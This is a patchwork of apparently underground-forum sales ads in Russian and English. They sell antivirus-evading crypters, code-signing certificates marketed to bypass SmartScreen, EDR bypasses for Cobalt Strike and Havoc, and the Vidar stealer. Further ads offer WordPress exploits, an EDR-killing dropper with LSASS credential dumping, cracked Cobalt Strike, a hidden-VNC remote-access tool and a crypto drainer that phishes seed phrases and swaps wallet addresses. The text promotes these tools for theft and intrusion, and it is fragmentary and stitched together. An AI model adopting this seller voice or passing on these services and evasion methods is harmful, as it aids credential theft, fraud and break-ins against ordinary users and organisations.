Высочайший отстук (в зависимости от вашего софта)
Цена: 40$ за файл
Контакт telegram: @cryptplease
ENG
Hello forum users, I offer services for crypt (encryption) of your EXE files
I make a file for the strait (Bing, Booking, NFT, mailing to the building,
etc.);
Bypassing Browser alerts, Windows Defender proactive protection
Установлю/настрою любой Ваш софт, админ саппорт, помощь новичкам.
Работу выполняю качественно и в кратчайшие сроки.
Есть репутация на других форумах, опыт более 10 лет
Частый онлайн. О цене договоримся.
Подробности по контактам:
Jabber: "monk27@exploit.im"
Телеграм: "@monkbotnet"
Здравствуйте,
Представляем сервис лучшего крипта ваших APK файлов на рынке, с обходом
варнинга от Google Play Protect + обход встроенного McAfee на 8-9 Android.
Сайт сервиса доступен в TOR onion с возможностью онлайн авто криптом APK и с
автоматизированной оплатой в BTC.
Тред на соседнем борде:
xttps://forum.exploit.in/topic/154583/
- имеется возможность забирать файлы после морфа через API.
- криптованные APK проходят валидацию Google Protect и McAfee на 8-9 Android.
- реальный результат проверки выводится на основании отчетов Dyncheck.
- стабильный онлайн саппорта.
- работоспособность на всех версиях Android
- практически полный обход всех антвирусов. по Dyncheck
Возможности:
- морф манифеста (packagename, random activitis, class и т.д.).
- морф текстовых строк на уровне смали кода (шифруются случайным ключом,
поверх бейс).
- морф названий ресурсов (опционально).
- обфускация манифеста и частей кода на уровне смали кода.
- генерация запутывающих trash smali опкод (опционально)
и т д..
На данный момент доступны планы:
1 крипт = 30$
1 неделя (10 криптов в день) = 130$
1 неделя (20 критпов в день) = 200$
1 неделя (40 криптов в день) = 320$
*любой тарифный план заканчивается по истечению срока, то есть недоиспользованное количество криптов не переходит.
На выходе:
- скан проверки антивирусами файла на Dyncheck для мониторинга возможных
ложных срабатываний
- криптованный APK файл.
Контакты:
- пм.
Условия:
- выдаем ссылку на сайт в jabber/пм после короткого общения о
характере\направленности работ софта.
- максимальный размер APK 5 мб.
- важно! запрещено проверять файлы на Virustotal, обфусцированные на нашем
сервисе (проверяем по хэшу).
- важно! сервис не работает с приложениями, которые потенциально могут
причинить вред пользователям стран СНГ (строки автоматически проверяются по
блеклисту).
- важно! сервис оставляет за собой право в отказе обфускации приложения без
объяснения причин.
- важно! сервис оставляет за собой право в будущем пересмотреть цены.
EV CODESIGNING CERTIFICATES
(RU)
Мы продаем сертификаты по заказу или со склада
Сертификаты по предварительному заказу: срок изготовления 2-5 дней
Обсуждение оптовых заказов
Сертификаты продаются строго в одни руки.Свежие и не использованные.
Мы можем создать название компании в соответствии с вашими требованиями.
Мы защищаем вашу конфиденциальность, никаких "облачных" подписей.
Что такое EV Code Signing?
1.Обход Microsoft SmartScreen
2.позволяет игнорировать красные и желтые предупреждения UAC
3.Программное обеспечение вызывает больше доверия у пользователей
4.Обход некоторых антивирусов, основанных на обнаружении сигнатур
Варианты доставки
1. Мы предоставляем удаленный доступ бесплатно 24/7
2. Вы можете использовать свой собственный аппаратный токен для установки
сертификата - SafeNet eToken 5110 CC, Rutoken 3.0
FAQ
Сертификаты действительны в течение 1 года
Обычно у нас есть запасы, мы можем доставить их немедленно, предварительно
связавшись с нами
Сертификаты не заменяют криптовалюты
Сертификаты могут быть отозваны, если центр сертификации получит слишком много
жалоб на злоупотребления, для белого софта можно использовать в течение всего
года
Цена
Мы предоставляем различные центры сертификации
1.GlobalSign ~~$4000~~ $2950 , Цена предзаказа**$2600**
2.Sectigo $2900
3.Certum $2500, Цена предзаказа****$2350****
Escrow за ваш счет
Контакты
TG:https://t.me/ETaddict (Copy and paste)
@EVcodesign not working!
Jabber:0x4adolt@exploit.im
У меня нет других контактов! Проверьте через PM перед торговлей!
(EN)
We sell certificates by order or from stock
Pre-order certificates: production time 2-5 days
Discussion of bulk orders
Certificates are sold strictly in one hand.fresh and not used.
We can set up a company name according to your requirements.
We protect your privacy, no "cloud" signatures.
What is EV Code Signing?
1.Bypass Microsoft SmartScreen
2.Allows you to ignore red and yellow UAC alerts
3.Software is much more trusted by users
4.Bypass some antivirus based on signature detection
Delivery options
1. We provide remote access for free 24/7
2. You can use your own hardware token to install the certificate - SafeNet
eToken 5110 CC,Rutoken 3.0
FAQ
Certificates valid for 1 year
Usually we have stock, we can deliver immediately, contact us first
Certificates are no substitute for crypts
Certificates may be revoked if the certificate authority receives too many
complaints of abuse, for white soft can be used for a full year
Price
We offer various CAs
1.GlobalSign ~~$4000~~ $2950**,** pre-order $2600
2.Sectigo $2900
3.Certum $2500 , pre-order $2350
Escrow at your expense
Contacts
TG:https://t.me/ETaddict (Copy and paste)
@EVcodesign not working!
Jabber:0x4adolt@exploit.im
I don 't have any other contacts!Verify via PM before trading!
Sophos Endpoint Detection (EDR/XDR/MDR) Havoc bypass
Bitdefender Endpoint Detection and Response (EDR) Cobalt Strike bypass
Bitdefender Endpoint Detection and Response (EDR) Havoc bypass
ESET Endpoint Antivirus Cobalt Strike bypass
ESET Endpoint Antivirus Havoc bypass
Windows Defender + Smartscreen (W10-22H2) Cobalt Strike bypass: excel (.xll document)
Windows Defender + Smartscreen (W10-22H2) Havoc bypass: excel (.xll document)
Windows Defender + Smartscreen (W11-23H2) Cobalt Strike bypass (DLL sideloading, chrome binary)
Windows Defender + Smartscreen (Windows 11-23H2) Havoc (DLL sideloading, chrome binary)
https://scanner.to/result_EDR/qzpMBWRv6B9e
https://scanner.to/result_EDR/CCj3JHAxXG4G
https://scanner.to/result_EDR/4FVc8d3qRVaL
https://scanner.to/result_EDR/dNv7z8AkzMZQ#
https://scanner.to/result_EDR/Tq8AhX3E8Cb8
https://scanner.to/result_EDR/LX9VuYjd8YHk
All tests on scanner.to are performed with an active internet connection and
using small-sized files. Recently, there have been instances of individuals
attempting to circumvent others' efforts by disabling their internet
connection and using significantly large payloads, exceeding 100 MB. Please
exercise caution.
Welcome to our shop! Please, make yourself comfortable and feel free to ask anything you need. I'm here to share my experience and knowledge with those who seek it. Rest assured, all our work has been conducted under real AV/EDR environments, utilizing the top tools available in the market. If you have any questions or need guidance, don't hesitate to reach out. For your peace of mind, we only take orders through a secure escrow or guarantor system. Looking forward to assisting you on your journey!
Technical information
Features
Formarts supported
Other services
Spoiler: FAQ
¿Does this product will work with Mimikatz or any C# assembly?
- Yes, it does.
Could you please conduct a test for me?
- Yes, we can conduct a test after you place your order and demonstrate a
serious commitment to proceeding with the work.
¿Do you have Telegram?
- No, we do not use Telegram. Please contact us directly via DM. After
placing an order, we can communicate through Jabber or Tox.
Spoiler: TERMS & CONDITIONS
Spoiler: ARTISTIC CREDIT TO:
**BEWARE OF SCAMERS! THE ONLY CONTACT IS IN THIS TOPIC! WE DO NOT HAVE SUPPORTS, BE SURE TO REQUEST VERIFICATION VIA THE FORUM DM!
ОСТЕРЕГАЙТЕСЬ СКАММЕРОВ! ЕДИНСТВЕННЫЙ КОНТАКТ ДЛЯ СВЯЗИ НАХОДИТСЯ В ЭТОЙ ТЕМЕ! У НАС НЕТ САППОРТОВ, ОБЯЗАТЕЛЬНО ЗАПРАШИВАЙТЕ ВЕРИФИКАЦИЮ ЧЕРЕЗ ЛС ФОРУМА!
Balamut Service**
CODE SIGNING CERTIFICATES
Bypass SmartScreen
Organization Validated (OV), Extended Validation (EV), Qualified Certificate
**Информация по сертификатам:
1.** Цены на сертификаты
2. [Преимущества EV сертификата](https://telegra.ph/Obshchaya-informaciya-
po-EV-06-29)
3. [Преимущества OV сертификата](https://telegra.ph/Obshchaya-informaciya-
po-OV-06-29)
4. [Условия сделки через гаранта](https://telegra.ph/Usloviya-sdelki-
cherez-garanta-06-29)
Контакты:
На счет покупки писать в ЛС форума или в телеграм
Mail cscsolphy@proton.me
Balamut Service
CODE SIGNING CERTIFICATES
Bypass SmartScreen
Organization Validated (OV), Extended Validation (EV), Qualified Certificate
**Information about certificates:
1.** Pricelist
2. [Advantages of EV certificates](https://telegra.ph/General-information-
about-EV-07-09)
3. [Advantages of OV certificates](https://telegra.ph/General-information-
about-OV-07-09)
4. Terms and Conditions
Contacts:
To buy, write to the PM forum or telegram
Mail cscsolphy@proton.me
Shellter Pro 4.7. Only place you can buy. Polymorphic encryption.
Don't please compare with the price on their official website. This is very deceptive because no one can actually buy from there! If you wish go and try!
NOTE: You can see on the screenshot "[GUI v1.3]". This may cause confusion in some people - 1.3 is the version of the GUI application for Shellter Pro and this GUI was launched only after Shellter Pro 4.0. So it is Shellter Pro 4.7 with GUI v1.3.
Price: $3K
Contact with PM.
Цена:$30**
Контакты:
PM**
** Telegram: @XM8WyK**
Jabber:xm8wyk@exploit.im
Tox:
D93BFA985B10A60BE66D15E4719CFC991BB93C369B10877FD106530D05ABE2440329F7610A78
SCANTIME
RESULT:avcheck.net/id/CznWky6mQaf9
Spoiler: Правила
**1. **На проверку криптованного файла дается 1 час.
2. Заказывая услугу клиент ознакомлен и соглашается со всеми правилами.
**3. **Не несу ответственности за любые противоправные действия, совершенные
клиентом. Вся информация представлена для ознакомления и обучения.
4. Слив на VT — запрещен.
5. Возврата средств нету! Если при условиях что файл не работает или не
стучит.
6. Сервис не гарантирует 100% обхода облачной защиты.
**7. **Разрешено сканировать файлы только на
antiscan.me, avcheck.net,
checkzilla.io.
VIDAR - Направленный стилер для вашей работы.
Отличный FAQ с описанием нашего функционала и скриншотами ( Нажмите для перехода ) <<
Скриншоты продукта: ( Советуем посмотреть FAQ )
**ВНИМАНИЕ: Тема является исключительно для отзывов данного продукта
Представляем вам наш продукт, который имеет достаточно хорошую репутацию. Данный стиллер заточен для автоматизации вашего труда.
НЕМНОГО О НАШЕМ ПРОЕКТЕ
Vidar - **разработан на С++ в конце 2018 года и с этих пор продолжает стабильную работу, что зарекомендовывает себя только с положительной стороны. Мы относимся с достойным вниманием к каждому клиенту, которые уважают и ценят нас. Данный Stealer имеет собственную команду, в которой каждый занят своим делом.
Мы обновляем и чистим наш билд каждую неделю ровно в понедельник на протяжении многих лет! По ситуации, если требуются , чистки могут быть ранее.
Vidar Support: Полноправный руководитель проекта, который поможет вам по любым
вопросам, имеет огромный опыт в управлении и оказания сервиса нашим клиентам.
Это не простая поддержка, наш специалист полностью ведёт разработку проекта.
Web Разработчик: опытный творец с многолетним опытом работы, который смог
реализовать наш WEB интерфейс
SOFT Разработчик: Не менее опытный специалист, который уже поддерживает проект
со стороны билда с 2018 года.
Системный администратор: Опытный специалист, который постоянно следит за
чистотой прокладок и работоспособностью сервера, который отражает DDOS атаки и
поддерживает всю инфраструктуру проекта.
У нас реализованы интересные методы отстука, для того что бы не нужно было менять экстренно билды, а именно после запуска билда, происходит запрос в телеграмм канал, где указана наша прокладка, которую мы постоянно и активно меняем, для поддержки чистоты IP, так же, если по каким либо причинам Телеграмм не доступен для компьютера, на котором был запуск, то используется резервный сервер Steam, в котором так же указана другая прокладка.
Наши клиенты могут использовать личные прокладки, как на прямую, так и через сервисы как TG и Steam, а так же удобная система уведомлений по работоспособности ваших прокладок.
Мы хорошо защищены от DDOS!
На нашем проекте присутствует автоматическая оплата в BTC и других способов оплаты нет, как только оплата через сайт!
Наш продукт собирает определённые данные:
и много других данных, такие как Discord, Steam, 2FA приложения, Некоторые плагины и прочее.....
**НАШИ ПРЕИМУЩЕСТВА:
1. Высокий отстук**
Наши показатели в основном достаточно высоки. Высокий отстук поддерживается:
1. Опытной нашей командой
2. Постоянными чистками, которые происходят стабильно раз в неделю, каждый
понедельник ( По ситуации может быть и ранее )
3. Уникальная система отстука с заменой прокладок, без замены билда в
реалтайм режиме.
4. Использование личных прокладок
При плохом отстуке, вы всегда можете обратится к руководству проекта и мы проведём анализ вашего трафика и сможем посмотреть, на каком этапе ваши боты были потеряны, у нас есть система, которая позволяет отслеживать качество отстука и иметь представление, сколько пользователей не дошло в панель.
2. Уникальные методы сортировки
Первый стиллер, в котором появились важные этапы сортировки "Метки, страны, важность, куки палки, уникальность, только с кошельками, избранные, сайтам и т.д." а так же доведены до ума
3. Система меток:
Вы можете отслеживать в логах только нужные вам линки по разным категориям и цветам, использовать лоадер исходя из ваших меток. Смотреть историю посещений важных ваших сайтов, которых вы добавили и всё это в одной строке в юзабильном формате. Данная система ускоряет в тысячу раз вашу работу.
4. Универсальная система
Вы можете обрабатывать лог с минимум скачиваний, а именно просматривать файлы
архива прямо из панели, не скачивая и не обновляя страницы. Можете скачать
сразу нужный формат кук или нужные вам WALLET кошельки. Просматривать пароли
используя метки и сортируя только нужные вам.
Удобная сортировка ваших логов по важным параметрам, так же можно сортировать
по количеству совпадений из меток.
Для любителей PAYPAL сделан счётчик кук Paypal, при активации данной настройки вы сможете сразу видеть в каком логе сколько кук от сайта Paypal, а так же сортировать по этому параметру.
5. Система уведомлений
Наша система уведомлений поможет вам не пропустить уведомления и постоянно оставаться в работе. Вы будете получать уведомления по телеграм, в списках логах, в панели, а так же лично от администрации. Конечно все системы уведомлений опциональны и удобны для вашего пользования.
6. Хранение данных и их удобное скачивание
Ваши логи находятся в полной безопасности, мы храним ваши данные уже более 2х
лет и не было ни одной утечки за всё это время. Вы имеете доступ к логам, даже
если ваша подписка не активна!
У нас реализована умная скачка ваших логов, а именно, то что вы отсортировали
исходя из настроек сортировок, то вы можете скачать 1 кликом.
7. Блокировка AV ботов
Мы отслеживаем Айпи, HWID и вес архивов антивирусных ботов, что позволяет избежать появления их в ваших панелях.
8. Параметры для ваших траферов.
Удобная внешняя статистика для каждого отдельно случая, которая покажет вашему
траферу качество его трафика и соотношения отстука.
Вы можете выдать уникальную ссылку билда для трафера, по которой он сможет
скачать ваш файл, закриптовать и поставить на пролив, если вас не будет в
сети! (Если вы закончили работу с трафером, вы можете сгенерировать новую
ссылку и старая будет недоступна)
9. Отличный лоадер
Функциональный нерезидентный лоадер, вы можете установить запуск нужного вам файла по правилам исходя из ваших меток или нужных вам стран.
10. Фиксированная цена
с 2018 года мы не разу не меняли цены и не собираемся!
11. Уникальный подход к каждому клиенту
Мы идём на уступки нашим клиентам и часто даём бонус дни в тех или инных
случаях, иногда даже просто так, когда клиент просит для необходимых действий
( К примеру выкачать все логи сразу )
Мы работаем персонально с каждым клиентом и помогаем разобраться с работой
нашего продукта.
12. Раздел паролей и СС
Есть отдельный раздел по паролям, где вы можете выкачать в нужном вам формате
и маске списки ваших паролей, от определённых сайтов, к примеру админки WP.
Тоже самое относится и к СС
13. Высокая репутация
Мы имеем отзывы от людей с высокой репутацией на разных форумах. За много лет
работы не одного негативного случая по поводу утечки ваших данных, а именно
логов! Мы не чекаем и не смотрим ваши данные, нам они не интересны! Данная
информация проверена временем, тестами и т.д.
(Люди закидывали 50-100-500$ на Wallet кошельки и они оставались лежать там по
несколько месяцев, пока сам владелец не вытаскивал их)
ЦЕНЫ НА НАШ ПРОДУКТ
-------------------------------------------------------------------------------------------------------------
7 дней -130$ / 14 дней -200$ / 30 дней - 300$ / 60 дней -580$
/ 90 дней - 750$
-------------------------------------------------------------------------------------------------------------
ВАЖНАЯ ИНФОРМАЦИЯ И ПРАВИЛА!
КОНТАКТЫ ДЛЯ СВЯЗИ!
Мы предпочитаем работу в телеграмме и работаем только там!
Телега ( Постоянная и активная поддержка ):https://usrlnk.io/vidar
Контакты указаны моего компетентного сотрудника, он поможет в разрешении
всех ваших проблем.
Для связи с руководителем по важным вопросам, только через моего
сотрудника!
Так же мы уважаем абсолютно всех наших конкурентов, не строим козни, не устраиваем DDOS атак, всегда готовы и открыты к общению Просим так же относится к нам, так как здоровая конкуренция заставляет всех нас расти вверх
Продажа WEB-эксплойтов, если CVE нет в списке, напишите мне в личку! Selling WEB Exploits, if CVE is not in the list, PM me!
Детектор: Инструмент который найдёт уязвимые домены/IP из списка. Нужная вещь
если вы хотите автоматизировать проверку на большое кол-во доменов/IP.
Detector: Tool which will identify vulnerable domains/IP from list you
provide. Useful if you want to check multiple domain/IPs.
Умеются детекторы | Available detectors
CVE-2024-1071 - 9 million+ Downloads/Загрузок -
https://wordpress.org/plugins/ultimate-member/advanced/
CVE-2023-51409 - 1million+ Downloads/Загрузок -
https://wordpress.org/plugins/ai-engine/advanced/ (Detector + Exploit)
Могу написать на заказ дететоры и/или изменить/написать эксплойты | Can write detectors for these or edit/write exploits
CVE-2024-1071 - 9 million+ - <https://wordpress.org/plugins/ultimate-
member/advanced/>
CVE-2024-1207 - 3 million+ - https://wordpress.org/plugins/booking/advanced/
CVE-2023-6567 - 4 million + -
https://wordpress.org/plugins/learnpress/advanced/
CVE-2023-5761 - 1 million+ - <https://wordpress.org/plugins/burst-
statistics/advanced/>
CVE-2023-40010 - 1 million+ - <https://wordpress.org/plugins/woocommerce-
products-filter/advanced/>
CVE-2023-6063 - 47 million+ - <https://wordpress.org/plugins/wp-fastest-
cache/advanced/>
CVE-2023-25700 - 1 million+ - https://wordpress.org/plugins/tutor/advanced/
CVE-2022-45808 - 4 million+ -
https://wordpress.org/plugins/learnpress/advanced/
CVE-2023-0224 - 6 million+ - https://wordpress.org/plugins/give/advanced/
CVE-2023-23488 - 5 million+ - <https://wordpress.org/plugins/paid-memberships-
pro/advanced/>
CVE-2023-23489 - 4 million+ - <https://wordpress.org/plugins/easy-digital-
downloads/advanced/>
CVE-2023-6553 - 1 million+ - <https://wordpress.org/plugins/backup-
backup/advanced/>
CVE-2023-51409 - 1 million+ - <https://wordpress.org/plugins/ai-
engine/advanced/>
CVE-2023-5360 - 4 million+ - <https://wordpress.org/plugins/royal-elementor-
addons/advanced/>
CVE-2023-4666 - 4 million+ - <https://wordpress.org/plugins/form-
maker/advanced/>
CVE-2023-4596 - 6 million+ -
https://wordpress.org/plugins/forminator/advanced/
Пример | Example:
P.S. Public exploits from some CVEs might be available, you can pay only for Detector or/and edited exploits for your needs from me. | Публичные эксплойты из некоторых CVE могут быть доступны, вы можете заплатить только за Detector и/или купить отредактированный эксплоит (под свои нужды) у меня.
Holla!
This is a new private DROPPER(Integrated with 0day/1da y exploit's) wich kill & bypass old technique's of killing edr's and merged (All-in-one) tools to drop lsass + run any exe or dll + backdoor the system on reboot + and kill any antivirus or edr from "user low level " only! and this is the most modern style in this product! no need for admin privillage anymore!
UPDATE 15.11.23:
UPDATE 25.10.23:
1st AV/EDR (0%) discount.
2st AV/EDR (50%) discount.
3rd AV/EDR (100%) FREE AV/EDR.
Dump LSASS**+Kill Windows Defender + SmartScreen+LPE
Exploit( USER low level ) ONLY!
Windows last update 12/09/23**
Integrated exploit details:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36802
- PoC of this DAY:
~~Currenlty running 50% discount on several features of AV 's killer "NOT
EDR"!~~
Crowdstrike or BlackCarbon or SentinelOne or Cortex or
Mcafee or Sophos or TrendMicro or BitDefender are not
included in this offer.
-- Price's for dropper + av killer without any 0d4y/1d4y exploit:
22.09.23 Falcon Sensor EDR Killed( Local admin right 's requsted ).****
22.09.23 SentineOne EDR Killed( Local admin right 's requsted ).****
Tested on latest Win 10 + Windows Server 2022 + WD 11.
The new dropper will work on specific EDR's, also you can customize it as you
want.
ex: once executed kill edr, then choise where your backdoor to be installed,
or use several different locations, run any kind of your choise exe or dll or
vba, persistance your backdoor on boot through Windows API and more!
EDR's are completly FUD, and can run on specific EDR's, each client will have his own specific requriments and build.
Click to expand...
List of supported vulnerable vendor 's to this dropper.
Lsass dump exploit it will get clear text of passwords through any copy of mimikatz, the exploit completely private and bypass all AV's, it will dump lssas file and decrypt file with specific arguments to get all clear network / local logins.
-- Sales Terms:
-- Intellgence EDR's:
Crowdstrike or BlackCarbon or SentinelOne or Cortex or
Mcafee or Sophos or TrendMicro or Kaspersky.
l - Price start from $10k for above EDR 's + 1 dropper ( exe,
dll, vba, etc )+ LSASS exploit + persistance backdoor for auto run
+Log cleaner.( Without 0d4y/1d4y exploit's ).
ll - Price start from $15k for above EDR 's + 1 dropper ( exe, dll,
vba) + LSASS exploit + persistance backdoor for auto run**+ Log cleaner.(
0d4y/1d4y exploit's Included ).
NOTE:**
Contact PM or TOX only.
A5852A300E402AD8AA973E1147D024FFE7DCF34BCC203C7B9DFB8560A3B10361000000000003
Цены:
.LNK / .URL / .HTA Exploit 1 Build — $100
Other Exploits 1 Build —** $30
Контакты:****
PM
Telegram: @XM8WyK**
Jabber:xm8wyk@exploit.im
Tox:
D93BFA985B10A60BE66D15E4719CFC991BB93C369B10877FD106530D05ABE2440329F7610A78
Гарант-сервис XSS.is - https://xss.is/help/escrow/
Click to expand...
As the title states
ALL buyers received the new Arsenal Kit just released on 10th October 2023 as promised!
Selling it separately too , TOX or PM !
Selling Lifetime Best Cracked Cobalt Strike 4.9.1 + Arsenal Kits latest versions 24th January 2024!!
4.9.1 ORIGINAL HASH with FULL LICENSE , NOT THE RIPPED ONE FROM YOU KNOW WHO! +Latest original artifact kits!
Original cobalstrike.exe for those who want client to run on Windows , also added the cobaltstrike-client.sh for those who runs it on Linux!
ALSO I will share my cracking method to understand HOW it's cracked lifetime and have the original HASH and no code intervention on the original .jar file! It's included both original license, and lifetime license!
JUST ONE BONUS : Any update on the Arsenal Kit , it's provided for free as long as the Original License is valid. On the lifetime, you always get the updated Arsenal Kit always.
Also have the Lifetime License tweaks (both Client , and TeamServerImage cracked)
Original or cracked, you pick (for any Cracked version for lifetime usage, price changes)
CS 4.91 original hash proof:
Code:Copy to clipboard
# Cobalt Strike 4.9.1 (October 10, 2023)
1b17da633563bedea293971ff5da6ca7cf9508ba3cac2d347fdfc2a7a30e8ff1 Cobalt Strike 4.9.1 Licensed (cobaltstrike.jar)
CS 4.9.1 lifetime cracked working proof TeamServer(haven't intervened in the .class files at all, it's self signed license , self made files, so the back code it's clean) :
Bash:Copy to clipboard
October 10th, 2023 - Cobalt Strike 4.9.1
-------------
+ Updated the console help for the execute-assembly, inline-execute, and data-store commands.
+ Fixed issue where the Post-Ex obfuscate and cleanup settings were not applied correctly.
+ Fixed issue where the .NET assemblies stored in the Data Store were not used when Post-Ex obfuscate setting is true.
+ Fixed issue when applying UDRLs to Post-Ex DLLs (POSTEX_RDLL_GENERATE) would cause the dll to not initialize and fail.
Cobalt Strike 4.9.1 Client Cracked Lifetime by Mr M working :
Always go with ESCROW (fee applies on both ways)
First one who releases this on XSS.IS and JUST xss.is !
I take orders ONLY from XSS PM / TOX for this sell
TOX :
C40D8825F67346F9DEB875A9AC63EEECF3B8E9DD1563D021CED1DCF9E7019E78D4CB4DDE385F
Ручная проверка работоспособности Ваших файлов на популярных лицензионных антивирусах (статический анализ и эвристический/динамический) с подробным отчетом.
Список АВ:
360 total security
Avast
MSE
Avira
Bitdefender
Commodo
Emsisoft
eset nod32
F-secure Safe
Kaspersky Total Security
Malvarebytes
AVG
Panda
Sophos
Trend micro
Adavare
Total Defense
Все антивирусы обновлены до последних версий,и регулярно обновляются,во всех антивирусах отключена отправка информации, статистики.
Так-же есть возможность проверки без интернета и на пользовательских (без админ. прав) учетных записях.
Так же возможны другие пожелания (изменение настроек OS или AV, скриншот, запись видео и т.д.)
Стоимость проверки 20$
Постоянным клиентам скидка =)
EV CODESIGNING CERTIFICATES
(RU)
Мы предлагаем нашим клиентам услугу одноразовой подписи для пробных и тестовых
целей.Регулярная замена новых сертификатов
Я предоставлю результаты av сканирования перед доставкой.Ваши файлы должны
быть зашифрованы
Обход антивируса и smartscreen,Гарантия только сертификаты.
*Обновления сервиса
Мы предоставляем код подписания обхода Антивирус, Smartscreen, Chrome
предупреждение $500 первый файл, $400 второй файл
Антивирус и Smartscreen только $300 каждый знак
Если Вам необходим уникальный сертификат, пожалуйста, свяжитесь с нами
Контакты
TG:https://t.me/ETaddict (Copy and paste)
Jabber:0x4adolt@exploit.im
(EN)
We offer one time signature service for trial and testing ,regularly replace
certificates with new ones
I will provide av scantime&runtime results before delivery
Bypass antivirus and smartscreen,only certificate part is guaranteed.your file
must be fud
*Service Updates!!
We provide code signing bypass antivirus,smartscreen,chrome alert $500 1st
file, $400 2nd file
Antivirus and smartscreen $300 each sign
Unique certificate >>Price from $2350
Contacts
TG:https://t.me/ETaddict(Copy and paste)
Jabber:0x4adolt@exploit.im
**Verify via PM before trading!
chrome bypassed
Firefox bypassed
**
Spoiler: Закрыто на депозит. Closed for deposit. 3k$
**I Have rewritten almost 90% of its features, it has become a big optimization, its stability is effectively rather than very good, everything is working efficiently and stably.
Recommendation for best results.**
~ I suggest you run it on a Dedicated /RDP ("Don 't use a cheap server")
~ I suggest you using a private crypter stub.
~ Note this. ( it's not a Botnet/RAT/Loader.) **( it is a hVNC )
==Features of Pandora HVNC==**
~ Scale Resolution
~ WebGL Support 100%
~ Hidden Desktop.
~ Reverse Connection.
~ Lightweight TCP Server.
~ IPV4 / DNS Support.
~ Copy/Paste (Internal) - Access to all applications / Mouse & Keyboard
Controls.
~ Every application is being forwarded through the Hidden VNC connection
without restrictions.
~ Encrypted Connection.
~ Supported Browsers & Mail Applications:
~ Chrome
~ Edge
~ Firefox
~ Brave
~ Comfortable
~ Maxthon
~ Vivaldi
~ FoxMail
~ Outlook
~ ThunderBird
~ Browser Profile Cloner Session/ Cookie/ Password/ History.
~ Process Suspension.
~ 2FA Recovery Bypass (If 2FA App is installed).
~ CMD/PowerShell Prompt.
~ C#/C++ (NET/Native) Crypter Compatibility.
~ Reflective Stub Injection (Memory Only, No Disk).
~ Small Stub ~ 600kb.
~ Stub is RunPE Compatible.
~ Stub .NET Version 4.0.
~ Server .NET Version 4.5.
~ Quality Adjustment & Image Resize of hVNC.
~ Compressed Image Support for faster Interaction.
~ Client Information
~ Client Note
~ Freezing Browsers
~ hVNC Panel .
~ Interval.
~ Quality.
~ Resize.
~ Monitor FPS.
~ Utilization: (CPU, RAM, Disk, GPU, Network)
~ Task manager.
~ Kill process.
~ Restart Process.
~ Refresh.
~ Search.
~ File manager.
~ Cut.
~ Copy.
~ Paste.
~ Delete.
~ Upload.
~ Download.
~ Rename.
~ New Folder.
~ Execute.
~ Refresh.
~ Builder Option.
~ Startup.
~ Assembly, Icon.
~ Sleep time.
~ Clone Profile auto.
~ Enable offline logger.
~ Password Recovery.
~ All Chrome Based.
~ All Firefox Based.
~ Edge / Internet Explorer.
~ Password.
~ Cookies.
~ Password.
~ History.
~ Credits.
~ Autofill.
~ Bookmarks.
~ Stub option.
~ Update.
~ Disconnect.
~ Remove.
~ Restart.
~ Client PC.
~ Restart.
~ Shut down.
~ Download and execute.
~ From Disk.
~ From Url.
~ Keylogger .
~ Online.
~ Offline.
Pandora hVNC Pirces
1 Month $499.00
3 Months $849.00
6 Months $1199.00
12 Months $1899.00
Video: Pandora hVNC Hidden Desktop Hidden Chrome Cloner Profile.
New Video:
This domain has been removed hiddenvnc.com
Here is the new official domain www.Hvncs.com
==Pandora hVNC (Hidden Virtual Network Computing)==
Q: What is Hidden VNC?
A: Hidden VNC is a technique used by the most advanced users, and by far the most exciting way to manage your Computer System hidden without interacting with the main desktop at all, simply because it creates a new hidden desktop.
Q: Since you mentioned that the software is used by advanced users, does it imply that i won't be able to use it since i am a intermediate user?
A: Absolutely not, the software is designed for intermediate users as well allowing you with a click of a button to manage your computer systems.
Q: What can i do with it?
A: Once the Hidden VNC is installed on your remote computer, you will be able to interact with it silently without any pop ups.
Q: Is the software compatible with all windows versions?
A: Yes it is compatible with all Windows Versions 32/64 bit except Windows XP and Vista.
Disclaimer / ToS:
~ Using the software in order to gain access to unauthorized computer systems
it is illegal and I am not responsible.
~ In case of software misuse i do not have any kind of association with your
activity.
~ In addition, if the software is posted to third party forums for
cracking/warez/ i will also proceed in license termination.
~ Terms Of Service may change whenever i want, relevant update will be posted
here regarding the matter.
~ Kindly note that the thread is only for reviews, any questions you might
have regarding the software's functionality they will be answered through PM
or Telegram.
~ Refunds are not applicable, software is working as intended.
~ I do not agree to provide any kind of test licenses except Escrow, where
those will guarantee the software's functionality.
~ Your opinion always matters and it is most welcome, i encourage you to ask
for new features also report any bugs you might spot.
~ Purchasing the software you automatically accept the ToS.
~ Accepted Guarantor.
Official Website:
https://pandorahvnc.sellpass.io/
Official Website: https://hvncs.com/
Telegram Group: https://t.me/PandorahVNC
Telegram PM: https://t.me/hVNCs
Scarlet
Spoiler: EN
Get the Seed-phrase & Password of Wallets in Windows & Drain Crypto Exchange and more
Spoiler: What do you get with the purchase?
**Uncrypted 32-bit Dropper EXE (size 300 KB) written in C++
Uncrypted Plugins (.exe | x64) Written in C++
Web control c2 panel made in PHP
The software only works on Windows 8/8.1, 10 or 11
I configure the software
Support and updates 24 hours **
Spoiler: What are you doing?
**The purpose is to make the target hardware wallet seed phrase compatible. When the target opens their wallet, they will see the decoy page appear above their target wallet. moved, minimized or closed. There is no way for the user to close the decoy page as it will always appear. The purpose of this is for the user to be convinced that their wallet profile was deleted and they must enter their seed phrase to restore the wallet state
To also obtain the passwords of browser extension wallets, only for specific
attacks, not for mass spam.
We also have a crypto swapper and crypto clipper functionality for browsers
until now (chrome), the cryptoswap works by replacing the address and QR Code
of the checkout of a page, our list of currently available pages are:
[BitRefill, Cryptomus, Fixedfloat, G2A , HoodPay and Sellix]
While our cryptoclipper also works for now in (chrome) and on all websites,
when the user copies a cryptographic address it will be replaced by one that
you assign
our currency list: [BTC, ETH, BNB, TRX, LTC, SOL, DASH, DOGE, BCH, XMR, TON]
also feature to drain crypto exchange wallet (Binance & Stake Casino) at
the moment
The crypto drainer for exchanges or websites works when the user makes a
withdrawal, all the funds in his wallet, not just the fund he assigned, will
be sent to your address.**
Spoiler: Our Features
**- Auto Word Suggestor bip39
- Works on all clean systems without issue
- Very low CPU usage, does not overload the system
- BIP 39 Validation of inputs In real-time and at the shipment and make it impossible to get an invalid seed phrase
- In the area of obtaining password from chrome extension wallets, our injection is persistent and obtains passwords without loss
- Supports multiple wallets at once
- We have all the templates right, you can request a new template or wallet of your choice
- If you already have a theme for a wallet made, we can add them, with extra. features included
- A clean, beautiful and easy-to-use control panel with the necessary filter to work comfortably
